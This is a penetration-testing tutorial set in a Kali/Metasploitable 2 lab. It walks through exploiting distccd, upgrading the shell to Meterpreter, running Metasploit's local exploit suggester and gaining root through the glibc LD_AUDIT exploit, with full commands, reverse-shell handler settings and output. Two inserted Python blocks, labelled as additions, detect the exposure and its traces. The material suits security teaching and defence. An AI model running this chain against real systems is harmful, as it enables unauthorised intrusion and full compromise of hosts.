So you've managed to get a shell on the target, but you only have measly low-level privileges. Now what? Privilege escalation is a vast field and can be one of the most rewarding yet frustrating phases of an attack. We could go the manual route, but as always, Metasploit makes it easy to perform local privilege escalation and get root with its exploit suggester module.
To run through the process, we're using Kali Linux as the attacking machine and Metasploitable 2 as the target. You can set up or use a similar pentesting lab — or the same one — to follow along with the guide below.
Step 1: Get Session on Target
The first thing we need to do is get a session with low privileges on the target. We can easily do this with Metasploit. Type msfconsole in the terminal to launch it.
~$ msfconsole
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
Metasploitable contains a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by taking advantage of combined processor power. Unfortunately, this version of the program allows a remote attacker to execute arbitrary commands on the server.
We can search for the exploit using the search command:
msf5 > search distcc
Matching Modules
================
   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution
To load the module, type use followed by the full path of the module:
msf5 > use exploit/unix/misc/distcc_exec
We can now see the available settings with the options command:
msf5 exploit(unix/misc/distcc_exec) > options
Module options (exploit/unix/misc/distcc_exec):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   3632             yes       The target port (TCP)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Target
It looks like we only need to set the remote host address since the remote port is already set using the default port number. Use the set command to specify the appropriate IP address of the target:
msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50
rhosts => 10.10.0.50
Now we are ready to launch the exploit. Use the run command, which is just a shorter alias for exploit:
msf5 exploit(unix/misc/distcc_exec) > run
[*] Started reverse TCP double handler on 10.10.0.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo sWI9yfQYbPxuIGrh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sWI9yfQYbPxuIGrh\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.0.1:4444 -> 10.10.0.50:58006) at 2019-11-19 11:46:02 -0500
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
We can see that a command shell was opened, and running uname -a verifies we have compromised the target.
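A defender-side check for the exposure described above, added here as an example (it is not part of the original article): it reads `ps -eo args` style output and flags distccd instances started without an --allow restriction, or with one wider than a chosen size. The sample process list and the 256-address threshold are constructed assumptions.

```python
import ipaddress
import shlex

# Constructed sample of `ps -eo args` output (not taken from the article).
SAMPLE_PS = """\
/usr/sbin/sshd -D
distccd --daemon --user daemon --allow 0.0.0.0/0
distccd --daemon --allow 10.10.0.0/28 --allow 127.0.0.1
distccd --daemon --port 3632
"""

MAX_ADDRS = 256  # assumption: anything wider than a /24 deserves review


def audit_distccd(ps_output, max_addrs=MAX_ADDRS):
    """Return (command_line, finding) pairs for risky distccd invocations."""
    findings = []
    for line in ps_output.splitlines():
        argv = shlex.split(line)
        if not argv or argv[0].rsplit("/", 1)[-1] != "distccd":
            continue
        # Collect every client range given as "--allow X", "-a X" or "--allow=X".
        allowed = []
        for i, arg in enumerate(argv):
            if arg in ("--allow", "-a") and i + 1 < len(argv):
                allowed.append(argv[i + 1])
            elif arg.startswith("--allow="):
                allowed.append(arg.split("=", 1)[1])
        if not allowed:
            findings.append((line, "no --allow restriction"))
            continue
        for spec in allowed:
            try:
                net = ipaddress.ip_network(spec, strict=False)
            except ValueError:
                findings.append((line, "unparsable --allow " + spec))
                continue
            if net.num_addresses > max_addrs:
                findings.append((line, "overly broad --allow " + spec))
    return findings


if __name__ == "__main__":
    for cmd, finding in audit_distccd(SAMPLE_PS):
        print(f"{finding}: {cmd}")
```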
Step 2: Upgrade to Meterpreter
To use Metasploit's local exploit suggester, we need to upgrade our basic Unix command shell to a Meterpreter session. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.
Background session 1? [y/N] y
msf5 exploit(unix/misc/distcc_exec) >
We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:
msf5 exploit(unix/misc/distcc_exec) > sessions
Active sessions
===============
  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
The easiest way to upgrade a regular shell to a Meterpreter session is to use the -u flag followed by the session number to upgrade:
msf5 exploit(unix/misc/distcc_exec) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.0.1:4433
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 2 opened (10.10.0.1:4433 -> 10.10.0.50:32979) at 2019-06-19 11:47:52 -0500
[*] Command stager progress: 100.00% (773/773 bytes)
We can see the post module run and a new session open. We can again verify this with the sessions command:
msf5 exploit(unix/misc/distcc_exec) > sessions
Active sessions
===============
  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    10.10.0.1:4444 -> 10.10.0.50:58006 (10.10.0.50)
  2         meterpreter x86/linux  uid=1, gid=1, euid=1, egid=1 @ metasploitable.localdomain  10.10.0.1:4433 -> 10.10.0.50:32979 (10.10.0.50)
And we can interact with our new Meterpreter session using the -i flag on the desired session:
msf5 exploit(unix/misc/distcc_exec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
Step 3: Run Exploit Suggester
Metasploit post modules work by running on a background session, not directly in the session itself, so background session 2 (our Meterpreter shell) and return to the main prompt. We can then load the local exploit suggester using the following command:
msf5 exploit(unix/misc/distcc_exec) > use post/multi/recon/local_exploit_suggester
When we take a look at the options, we only need to specify the session we want to run this on:
msf5 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
Simply set the session to number 2, which is our Meterpreter shell:
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
And type run to kick it off:
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.0.50 - Collecting local exploits for x86/linux...
[*] 10.10.0.50 - 26 exploit checks are being tried...
[+] 10.10.0.50 - exploit/linux/local/glibc_ld_audit_dso_load_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/glibc_origin_expansion_priv_esc: The target appears to be vulnerable.
[+] 10.10.0.50 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[*] Post module execution completed
We can see the module checks a number of local exploits and returns a few that seem viable. Awesome.
Step 4: Get Root
The final thing we need to do is use one of these exploits to get root on the system. We'll try the first one that was suggested to us. This exploit takes advantage of a vulnerability in the glibc dynamic linker, in which the LD_AUDIT environment variable allows loading of a setuid object that ultimately runs with root privileges.
msf5 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/glibc_ld_audit_dso_load_priv_esc
Looking at the options, we only need to set the session again — the default executable path will work for now:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > options
Module options (exploit/linux/local/glibc_ld_audit_dso_load_priv_esc):
   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on.
   SUID_EXECUTABLE  /bin/ping        yes       Path to a SUID executable
Exploit target:
   Id  Name
   --  ----
   0   Automatic
Set the session just like before:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set session 2
session => 2
We can also set the payload to give us another Meterpreter session when the exploit completes:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
And set the appropriate listening host (the IP address of our local machine) and port:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lhost 10.10.0.1
lhost => 10.10.0.1
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > set lport 4321
lport => 4321
Finally, type run to launch the exploit:
msf5 exploit(linux/local/glibc_ld_audit_dso_load_priv_esc) > run
[*] Started reverse TCP handler on 10.10.0.1:4321
[+] The target appears to be vulnerable
[*] Using target: Linux x86
[*] Writing '/tmp/.BlrZu4n' (1271 bytes) ...
[*] Writing '/tmp/.18qZUt' (281 bytes) ...
[*] Writing '/tmp/.DoiFwlxPt' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 3 opened (10.10.0.1:4321 -> 10.10.0.50:56950) at 2019-11-19 11:57:19 -0500
meterpreter >
We now have a new Meterpreter session on the target, and we can drop into a shell to verify we have obtained root access:
meterpreter > shell
Process 4886 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=1(daemon)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
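The run above leaves two things a defender can hunt for on the host: small dot-prefixed files with random names written to /tmp, and a process environment that sets LD_AUDIT. The following is an added example, not code from the original article or from Metasploit; the name pattern, age and size thresholds are assumptions chosen to match the output shown.

```python
import os
import re
import time

# Dot-prefixed name of 5-12 alphanumerics, like the dropped files shown above.
HIDDEN_RANDOM = re.compile(r"^\.[A-Za-z0-9]{5,12}$")


def hidden_tmp_drops(tmp_dir="/tmp", max_age_s=3600, now=None):
    """List small, recently written hidden files with random-looking names."""
    now = time.time() if now is None else now
    hits = []
    with os.scandir(tmp_dir) as entries:
        for entry in entries:
            if not HIDDEN_RANDOM.match(entry.name):
                continue
            if not entry.is_file(follow_symlinks=False):
                continue
            st = entry.stat(follow_symlinks=False)
            if now - st.st_mtime <= max_age_s and st.st_size < 64 * 1024:
                hits.append((entry.path, st.st_size, st.st_uid))
    return sorted(hits)


def procs_with_ld_audit(proc_root="/proc"):
    """Return (pid, LD_AUDIT value) for processes whose environment sets it."""
    hits = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, name, "environ"), "rb") as fh:
                env = fh.read().split(b"\0")
        except OSError:  # process exited or not readable by this user
            continue
        for var in env:
            if var.startswith(b"LD_AUDIT="):
                hits.append((int(name), var[9:].decode(errors="replace")))
    return sorted(hits)


if __name__ == "__main__":
    for path, size, uid in hidden_tmp_drops():
        print(f"review {path} ({size} bytes, uid {uid})")
    for pid, value in procs_with_ld_audit():
        print(f"pid {pid} runs with LD_AUDIT={value}")
```

/proc only lists running processes, so the environment check sees an attempt only while it is in progress; the file check still works afterwards as long as the files remain on disk.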
Wrapping Up
In this tutorial, we learned how to use Metasploit to get a shell on the target, upgrade that shell to a Meterpreter session, and use the local exploit suggester module to ultimately get root on the system. Metasploit not only makes initial exploitation easy but the post-exploitation phase as well. In the next article, we will explore some useful post modules to quickly gather information about the target.
Cover image by Pixabay/Pexels; Screenshots by drd_/Null Byte